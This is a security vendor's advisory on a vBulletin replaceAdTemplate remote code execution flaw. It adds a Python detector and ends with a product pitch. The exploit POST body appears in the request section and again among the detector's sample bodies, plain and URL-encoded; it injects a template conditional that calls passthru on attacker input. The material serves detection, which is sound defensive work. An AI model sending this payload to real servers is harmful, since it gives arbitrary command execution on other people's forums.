vBulletin 'replaceAdTemplate' - Remote Code Execution (CVE-2025-48828)
- Dee Sehejpal BSc (HONS)

- Jun 13

Application Details
vBulletin is a proprietary Internet forum software package written in PHP.
Vulnerability
Certain vBulletin versions might allow attackers to execute arbitrary PHP code by abusing Template Conditionals in the template engine.
Identification
By crafting template code that invokes a PHP function through an alternative call syntax, a quoted string followed directly by an argument list such as "var_dump"("test"), attackers can bypass the template engine's security checks and execute arbitrary PHP code.
Request: POST /vb
Payload (request body):
routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=rce&template=<vb:if condition='"passthru"($_POST["cmd"])'></vb:if>
Detection
By turning this request into a traffic file and a matching rule, we are able to detect attempts to execute arbitrary PHP code on the system.
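To make the detection logic concrete, the following added example (not Idappcom's signature 8026022 and not part of the original post) parses the POST body of a request, checks that it targets the replaceAdTemplate route, and then looks for a template conditional whose condition contains a quoted string immediately followed by an argument list, the bypass syntax described above. The sample request bodies are constructed for illustration; the encoded variant shows that the check still fires when the payload is URL-encoded.

```python
"""Detection helper for the vBulletin replaceAdTemplate pattern.

Added example, not Idappcom's signature 8026022. Flags POST bodies that hit
ajax/api/ad/replaceAdTemplate with a <vb:if condition='...'> whose condition
calls a PHP function via the quoted-string syntax, e.g. "passthru"(...).
"""
import re
from urllib.parse import parse_qs

# The value of the condition attribute on a <vb:if> tag, whichever quote style wraps it.
COND_RE = re.compile(
    r"""<vb:if\b[^>]*?condition\s*=\s*(?P<q>['"])(?P<cond>.*?)(?P=q)""",
    re.IGNORECASE | re.DOTALL,
)

# A quoted identifier directly followed by "(" : the alternative PHP call syntax
# that the template engine's checks do not catch ("var_dump"("test"), "passthru"(...)).
QUOTED_CALL_RE = re.compile(r"""(?P<q>['"])\s*[A-Za-z_]\w*\s*(?P=q)\s*\(""")

TARGET_ROUTE = "ajax/api/ad/replaceadtemplate"


def parse_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def is_replace_ad_template_exploit(body: str) -> bool:
    """True when the body targets replaceAdTemplate and its template carries a
    <vb:if> condition using the quoted-function-call bypass syntax."""
    params = parse_body(body)
    route = params.get("routestring", "").strip("/").lower()
    if route != TARGET_ROUTE:
        return False
    template = params.get("template", "")
    return any(QUOTED_CALL_RE.search(m.group("cond")) for m in COND_RE.finditer(template))


def scan_requests(requests: dict) -> list:
    """Return the names of the request bodies that match, in input order."""
    return [name for name, body in requests.items() if is_replace_ad_template_exploit(body)]


# Constructed sample request bodies (not captured traffic).
SAMPLE_REQUESTS = {
    # The payload shape from the write-up, unencoded.
    "exploit": """routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=rce"""
               """&template=<vb:if condition='"passthru"($_POST["cmd"])'></vb:if>""",
    # Same request with the body URL-encoded, as a client library would send it.
    "exploit_encoded": "routestring=ajax%2Fapi%2Fad%2FreplaceAdTemplate&styleid=1&location=rce"
                       "&template=%3Cvb%3Aif+condition%3D%27%22passthru%22%28%24_POST%5B%22cmd%22%5D"
                       "%29%27%3E%3C%2Fvb%3Aif%3E",
    # Legitimate use of the endpoint: a conditional on a template variable, no function call.
    "benign_template": """routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=header"""
                       """&template=<vb:if condition='$show["ad"]'>ad html</vb:if>""",
    # Suspicious template but a different route: outside this signature's scope.
    "other_route": """routestring=ajax/api/user/fetch&userid=1"""
                   """&template=<vb:if condition='"passthru"(1)'></vb:if>""",
}

if __name__ == "__main__":
    for name, body in SAMPLE_REQUESTS.items():
        print(f"{name:18s} -> {'ALERT' if is_replace_ad_template_exploit(body) else 'ok'}")
```

The route check keeps the rule narrow to the vulnerable endpoint, while the quoted-call regex is what actually distinguishes the bypass syntax from an ordinary template conditional; matching on the decoded parameter values rather than the raw bytes is what lets the same rule cover the URL-encoded form.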
Coverage
Idappcom have created signature 8026022 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional